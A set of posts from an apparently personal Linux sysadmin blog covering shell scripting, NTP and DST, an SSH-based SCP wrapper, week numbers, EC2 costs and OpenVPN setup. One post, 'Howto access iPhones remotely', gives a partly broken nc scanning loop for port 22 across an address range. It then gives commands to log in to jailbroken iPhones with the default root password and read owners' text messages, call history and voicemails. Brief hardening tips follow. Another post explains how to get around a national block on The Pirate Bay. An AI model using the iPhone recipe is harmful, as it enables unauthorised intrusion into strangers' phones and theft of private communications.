Adventures in Red Hat Enterprise Linux, CentOS, Fedora, OpenBSD and other open source solutions.

Aesthetics of shell scripting

Here is the problem; you need to print a single line filled with dashes. Will you just echo 80 dashes or write a beautiful loop for it?

The easy solution

$ echo "--------------------------------------------------------------------------------"

The aesthetic solution

$ n=0 ; while [ $n -lt 80 ] ; do printf "-" ; n=$(($n+1)) ; done ; echo

Both give the same result, but the easy solution is faster. Results from the machine I am working on:

Test                        Easy way         Aesthetics way
Time to execute             0.000 seconds    0.039 seconds
Bytes on disk               88               70
Complexity level            1                7
System calls                37               657
Lines printed in 1 minute   1471371          18318

The numbers show that simplicity is more efficient.

Prepare your Linux box for Daylight Saving Time (summer or winter time)

The summertime is starting soon. What can you do on your Linux machine to be prepared for Daylight Saving Time?

The bad news

Time is a very complicated matter; it shifts every half year, there are leap years and seconds, some countries change the start or end date of summertime, many countries have multiple timezones, some servers can be in one zone while the users can be in a different zone, and so on.
All the timezone information is stored in /usr/share/zoneinfo. The directories and files in there are definitions of what the displayed time should be. The displayed time is based on Coordinated Universal Time (UTC) adjusted to the rules listed in a timezone file in /usr/share/zoneinfo.
To change the timezone of your computer, copy a timezone file to /etc/localtime. For example, to set the timezone to Europe/Amsterdam:

# cp /usr/share/zoneinfo/Europe/Amsterdam /etc/localtime

Chances are that your distribution has a tool available to help you. Use it; it's likely easier. Fedora uses a tool called system-config-time to manage time and timezones.

The good news

Most likely your Linux box is already prepared for DST. On top of that, the Network Time Protocol (NTP) is so easy to use that syncing your time is no problem at all. To be prepared for DST, use NTP and update all packages on your Fedora machine like this:

# yum update
# yum install ntp
# service ntpd start
# chkconfig ntpd on

For any other distribution: update your system, install ntp and start it.

Google Apps problems

There seem to be some problems with Google Apps since approximately 11:00 CET on the 24th of February 2009. When you try to log in, you'll get an error like this:

Server Error
The server encountered a temporary error and could not complete your request.

Please try again in 30 seconds.

The title bar reads:

502 Server Error

The issue is discussed in the Google support forum. Meanwhile, we will wait for Google Apps to be available again...

Update: The problem seems to be fixed! (14:00 CET)

Using SSH instead of SCP

The SCP program is not needed; use this script to transfer files with SSH:

$ ssh user@host "cat /remote/file" > /local/file

To use this trick in a shell script-wrapper:

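$ cat
#!/bin/sh -x

# Split the scp-style first argument (user@host:path) into its parts.
host=$(echo "$1" | cut -d@ -f2 | cut -d: -f1)
user=$(echo "$1" | cut -d@ -f1)
remotefile=$(echo "$1" | cut -d: -f2)
# The second argument is the local destination.
localfile="$2"

if [ ! "$host" -o ! "$user" -o ! "$remotefile" -o ! "$localfile" ] ; then
 echo "Please use all required options, for example:"
 echo "$0 user@host:./file ."
 exit 1
fi

# If the destination is a directory, keep the remote file name.
[ -d "$localfile" ] && localfile="$localfile/$(basename "$remotefile")"

# $remotefile is expanded by the remote shell, so only pass trusted paths.
ssh "$user@$host" "cat $remotefile" > "$localfile"
$ chmod 755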

Now "replace" the normal SCP by using an alias:

$ alias scp="~/"

One flaw of this script is that all options will have to be configured statically in .ssh/config.
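
A second flaw: the wrapper passes "cat $remotefile" to ssh as one string, so the remote shell parses the path again and a space or shell metacharacter in it changes the command that runs. The following is an added example, not part of the original post, that single-quotes the path before sending it; the function names shquote, remote_cat_cmd and fetch are hypothetical and the sample paths are constructed.

```sh
#!/bin/sh
# Added example (not from the original post): quote the remote path so the
# remote shell sees it as one literal word. Function names are hypothetical.

# shquote STRING: wrap STRING in single quotes; an embedded single quote
# becomes '\'' (close the quote, add an escaped quote, reopen the quote).
shquote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# remote_cat_cmd PATH: the command string to hand to ssh. The "--" keeps cat
# from treating a path that starts with "-" as an option.
remote_cat_cmd() {
    printf 'cat -- %s' "$(shquote "$1")"
}

# fetch USER@HOST REMOTEPATH LOCALFILE: the transfer from the post, quoted.
fetch() {
    ssh "$1" "$(remote_cat_cmd "$2")" > "$3"
}

# Constructed sample paths: print what the remote shell would be given.
demo() {
    for p in './notes.txt' './my file.txt' "./it's here" './a; echo injected'; do
        printf '%-20s -> %s\n' "$p" "$(remote_cat_cmd "$p")"
    done
}
demo
```
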

Howto access iPhones remotely using OpenSSH

A jailbroken Apple iPhone with OpenSSH installed is accessible over the internet using ssh and the default root password "alpine".

You can use a short script to find IP addresses that have port 22 open and try to login. You can run this script from your Mac or any Linux machine.



mkdir -p /tmp/scan-iphones/open
mkdir /tmp/scan-iphones/closed

while [ "$third" -lt 192 ] ; do
while [ "$fourth" -lt 255 ] ; do
  if [ ! -f /tmp/scan-iphones/94.157."$third"."$fourth" ] ; then
   if [ ! -f /tmp/scan-iphones/open/94.157."$third"."$fourth" ] ; then
    if [ ! -f /tmp/scan-iphones/closed/94.157."$third"."$fourth" ] ; then
     if [ -f /tmp/scan-iphones/stop ] ; then
      echo "Stopping because /tmp/scan-iphone/stop exists."
      exit 1
     touch /tmp/scan-iphones/94.157."$third"."$fourth"
     nc -w 1 -z 94.157."$third"."$fourth" 22-22 > /dev/null 2>&1 && touch /tmp/scan-iphones/open/94.157."$third"."$fourth" || touch /tmp/scan-iphones/closed/94.157."$third"."$fourth"
     rm /tmp/scan-iphones/94.157."$third"."$fourth"

The IP addresses that have port 22 open are stored in /tmp/scan-iphones/open/*. Some of these IP addresses are not iPhones, so not every IP address listed there is vulnerable. To stop the script, press [CTRL]+[c] or type touch /tmp/scan-iphones/stop.

Now that you have IP addresses where you can login, use one of these "features":

Read all text messages

From your Mac or any Linux machine, type:

$ ssh [email protected]
# sqlite3 /private/var/mobile/Library/SMS/sms.db
SELECT * FROM message;

See the call history

From your Mac or any Linux machine, type:
$ ssh [email protected]
# sqlite3 /private/var/mobile/Library/CallHistory/call_history.db

Listen to voicemails

From your Mac or any Linux machine, type:

$ scp [email protected]:/private/var/mobile/Library/Voicemail/*.amr .

Open the finder, drag the .amr files on Quicktime to listen to them.

To secure your iPhone, you can use one or more of these measures:

  • Change the "root" password - On the Terminal, type # passwd.
  • Change the "mobile" password - On the Terminal, type # passwd mobile.
  • Disable OpenSSH start at boot time - Don't know how to do this yet.
  • Stop OpenSSH for now - launchctl unload -w /Library/LaunchDaemons/com.openssh.sshd.plist.
  • Set "PermitRootLogin" to "no" - in /private/etc/ssh/sshd_config.
  • If all fails: Uninstall OpenSSH - Using the tools that installed OpenSSH.
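
To check that the PermitRootLogin measure actually took effect, the following added example (not part of the original post) reads an sshd_config the way sshd does: keywords are case-insensitive, commented lines are ignored, and the first occurrence wins. The function names are hypothetical and the sample configuration is constructed; on the phone the file to pass would be /private/etc/ssh/sshd_config.

```sh
#!/bin/sh
# Added example: report whether an sshd_config still lets root log in.

# sshd_effective FILE KEYWORD: print the value sshd would use from the global
# section. Keywords are case-insensitive and the first occurrence wins.
sshd_effective() {
    awk -v want="$2" '
        BEGIN { want = tolower(want) }
        /^[ \t]*(#|$)/ { next }                  # comment or blank line
        { sub(/^[ \t]+/, ""); sub(/[ \t]*=[ \t]*/, " ") }  # allow "Key=value"
        tolower($1) == "match" { exit }          # Match blocks are conditional
        tolower($1) == want { print $2; exit }
    ' "$1"
}

# audit_sshd FILE: print findings; return 0 only when root login is off.
audit_sshd() {
    prl=$(sshd_effective "$1" PermitRootLogin)
    pwa=$(sshd_effective "$1" PasswordAuthentication)
    case "$prl" in
        no) echo "OK: PermitRootLogin no"; rc=0 ;;
        without-password|prohibit-password|forced-commands-only)
            echo "WARN: root can still log in with a key ($prl)"; rc=1 ;;
        "") echo "FAIL: PermitRootLogin unset, compiled-in default applies"; rc=2 ;;
        *)  echo "FAIL: PermitRootLogin $prl"; rc=2 ;;
    esac
    [ "$pwa" = no ] || echo "NOTE: password logins are on; change the default passwords"
    return "$rc"
}

# Constructed sample: the commented line does not count and the first
# uncommented PermitRootLogin ("yes") beats the later "no".
demo() {
    f=$(mktemp) || return 1
    printf '%s\n' '# constructed sample' 'Port 22' '#PermitRootLogin no' \
        'permitrootlogin yes' 'PermitRootLogin no' > "$f"
    status=0
    audit_sshd "$f" || status=$?
    rm -f "$f"
    echo "audit exit status: $status"
}
demo
```
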

Converting the weeknumber to a date and reversed in Linux

I hate it when people use week numbers, like "week 34". Week numbers are mostly not printed on any calendar or schedule. So here is how to convert a date to a week number and a week number to a date.

Converting the current date to a week number

This is an easy one, because the man page of date simply explains: %U - Displays week of the year (Sunday as the first day of the week) as a decimal number [00 - 53]. All days in a new year preceding the first Sunday are considered to be in week 0.

$ date +'%U'

Converting a specific date to a week number

A little harder, which is why you don't have to figure it out yourself; just copy, paste and replace to meet your requirements:

$ date --date='2009-10-2' +'%U'

Converting a week number to a specific date

This is not an easy one and requires a very nasty trick. To get a day in week 23 for example, use this command:

$ date --date="$(((23-$(date +'%-U'))*7)) days"
Mon Jun 8 12:11:40 WEDT 2009

(Note that 23 is the week number you'd like to get a date from.)

Help Denmark - how to connect to The Pirate Bay

We all love The Pirate Bay, I guess the Danish people do too.

Now that The Pirate Bay is blocked for Danish people, here is a recipe for connecting to The Pirate Bay after all.

UPDATE: Simply visit The Pirate Bay through Me in IT Consultancy.

1. Use a web-proxy in some other country.

This is a very simple trick. Go to either Proxify, Zend2, or any other anonymous proxy and enter

2. Use a proxy in some other country.

Find yourself an open proxy in any country but Denmark.
This trick is a little harder, because it's not very easy to find a working open proxy and the proxies that are open tend to be shut down or closed sooner or later.

3. Setup an SSH-tunnel via some other country.

This is an even more difficult trick, but it works rather reliably. It requires you to have access to a Linux or UNIX box somewhere outside Denmark.
Using OpenSSH:

$ ssh -L

When that's successful, visit http://localhost:8080 from your web browser.

Using Putty:

  1. Open Putty. We are going to make a new profile, so be sure to save it.
  2. Fill in the "Host name (or IP address)". This is the (free account on a) machine you are connecting to outside Denmark.
  3. Click "Connection" - "SSH" - "Tunnels".
  4. The source port is the entry of the tunnel, use "8080" for example.
  5. The destination is where the tunnel is sent to. Set it to
  6. Click "Add". Be sure to save this session, so you don't have to type this all again.
  7. Click "Open" to start the connection and the tunnel.

When that's successful, visit http://localhost:8080 from your web browser.

Good luck!

One month of Amazon Elastic Compute Cloud

It's been one month (23 days) since I moved to Amazon's EC2, aka Amazon Cloud, aka AWS. Overall I am very pleased with the performance of my instance, which I use as a webserver. The extra volumes also perform great. It's been up 100% of the time in January 2009.

Here are some numbers so you can get an estimate of what Amazon EC2 costs:

Rate | Usage | Cost
$0.11 per Small Instance (m1.small) instance-hour (or partial hour) | 537 Hrs | $59.07
$0.100 per GB Internet Data Transfer - all data transfer into Amazon EC2 | 22.554 GB | $2.26
$0.170 per GB Internet Data Transfer - first 10 TB / month data transfer out of Amazon EC2 | 32.379 GB | $5.50
$0.010 per GB Regional Data Transfer - in/out between Availability Zones or when using public IP or Elastic IP addresses | 0.023 GB | $0.01
$0.12 per GB-month of provisioned storage | 23.073 Count | $2.77
$0.11 per 1 million I/O requests | 4,398,873 Count | $0.48
Total | | $70.09

Overall I'd recommend Amazon EC2. It's a little more expensive than an average Private Hosting plan, but this setup is more scalable.


Determining the quality of a Dutch contracting company

As a freelancer in Dutch IT, you will almost always use a contracting company. This company makes an initial contact with the end-customer and receives and pays your invoices.

When you are in contact with a new contracting company, you can check IT Bemiddelaars to see what a company has done before, compare rates and cost.

When you would like to review an "IT bemiddelaar", please go to IT Bemiddelaars to enter the information you'd like to share.

Setting up an OpenVPN server and clients on Fedora Core

Besides the extensive OpenVPN documentation I couldn't really find a step-by-step guide on how to set up an OpenVPN server and client.

I want to be able to connect my Fedora Core 10 laptop to the home-network via a Fedora Core 10 server.

Overview of the network setup

The server is, running Fedora Core 10 with openvpn 2.1. Newer versions are likely to work as well.
The laptop has a dynamic IP address.

Setting up the server

Please read the OpenVPN documentation if you run into troubles.

First set up the Certificate Authority keys.

cd /usr/share/openvpn/easy-rsa/2.0/
vi vars
# Fill KEY_COUNTRY, KEY_PROVINCE, KEY_CITY, KEY_ORG, and KEY_EMAIL, all at the bottom.
. ./vars
# clean-all wipes any existing keys directory; run it on a first setup only.
./clean-all
./build-ca
# Press "enter" on each item.

Now set up the Server key and the Diffie Hellman key.

./build-key-server server
# Press enter on each item.
./build-dh

And build the client keys, each client needs its own key, with a unique Common Name. The IP address assigned to the client is related to the Common Name, so if you use non-unique Common Names, you will have conflicting IP addresses.

./build-key client1
./build-key client2
./build-key client3
mv keys /etc/openvpn

cp /usr/share/doc/openvpn-2.1/sample-config-files/roadwarrior-server.conf /etc/openvpn/server.conf
vi /etc/openvpn/server.conf
# Check the ca, cert, key and dh variables.

Start the server by issuing:

chkconfig openvpn on
service openvpn start
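
Because the client's IP address follows from its Common Name, it is worth checking the CA database for Common Names that sit on more than one valid certificate, for instance after a key was revoked and reissued. This is an added example, not part of the original post; it assumes the OpenSSL index.txt that easy-rsa keeps in the keys directory (here /etc/openvpn/keys/index.txt after the mv above), the function names are hypothetical and the sample database is constructed.

```sh
#!/bin/sh
# Added example: list Common Names that appear on more than one valid
# certificate in an easy-rsa (OpenSSL CA) index.txt.

# valid_cns INDEX: print "serial CN" for every certificate still marked V.
# Tab-separated fields: status, expiry, revoked-on, serial, file, subject.
valid_cns() {
    awk -F'\t' '$1 == "V" {
        n = split($6, part, "/")
        for (i = 1; i <= n; i++)
            if (part[i] ~ /^CN=/) print $4, substr(part[i], 4)
    }' "$1"
}

# duplicate_cns INDEX: print each CN used by two or more valid certificates.
duplicate_cns() {
    valid_cns "$1" | cut -d' ' -f2- | sort | uniq -d
}

# Constructed sample: client2 was revoked (R) and reissued once, which is
# fine; client1 has two valid certificates and is reported.
demo() {
    idx=$(mktemp) || return 1
    printf 'V\t190201120000Z\t\t01\tunknown\t/C=NL/O=Home/CN=server\n'   > "$idx"
    printf 'V\t190201120500Z\t\t02\tunknown\t/C=NL/O=Home/CN=client1\n' >> "$idx"
    printf 'R\t190201121000Z\t090301120000Z\t03\tunknown\t/C=NL/O=Home/CN=client2\n' >> "$idx"
    printf 'V\t190201121500Z\t\t04\tunknown\t/C=NL/O=Home/CN=client2\n' >> "$idx"
    printf 'V\t190201122000Z\t\t05\tunknown\t/C=NL/O=Home/CN=client1\n' >> "$idx"
    duplicate_cns "$idx"
    rm -f "$idx"
}
demo
```
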

Setting up the client

Move the ca.crt, client1.crt and client1.key to the client, in /etc/openvpn/keys, and copy the configuration. You will need to modify the client.conf a little bit.

cp /usr/share/doc/openvpn-2.1/sample-config-files/roadwarrior-client.conf /etc/openvpn/client.conf
vi /etc/openvpn/client.conf
# Find "remote" and set it to the internet address of your VPN server.

Start the client:

chkconfig openvpn on
service openvpn start

Checking if it worked

On both server and client, issue ifconfig tun0 to see what IP address is assigned to the entry of the tunnel. From either end of the tunnel you should be able to ping the other end. Also tcpdump -n -i tun0 should work.

Hope this works for you as well. Check /var/log/messages for information. /etc/init.d/openvpn status dumps a status of all connected clients to /var/log/messages.
